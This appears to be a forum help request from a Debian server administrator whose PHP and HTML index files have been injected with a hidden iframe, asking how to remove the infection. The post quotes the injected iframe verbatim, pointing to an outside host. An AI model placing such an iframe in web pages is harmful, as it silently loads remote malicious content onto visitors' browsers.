Hi, my server is Debian Lenny with ISPConfig3 (perfect server guide).
Now someone inserts the iframe in every index or default files (PHP, HTML)
    Code:
    <iframe src="http://u0t.ru:8080/index.php" width=129 height=186 style="visibility: hidden"></iframe>

I checked the clamav log [OK]
    RKHunter log likes:

    Other logs rkhunter is OK.

I guess some warnings in the log above is bad.
How do I remove this virus out of my server?
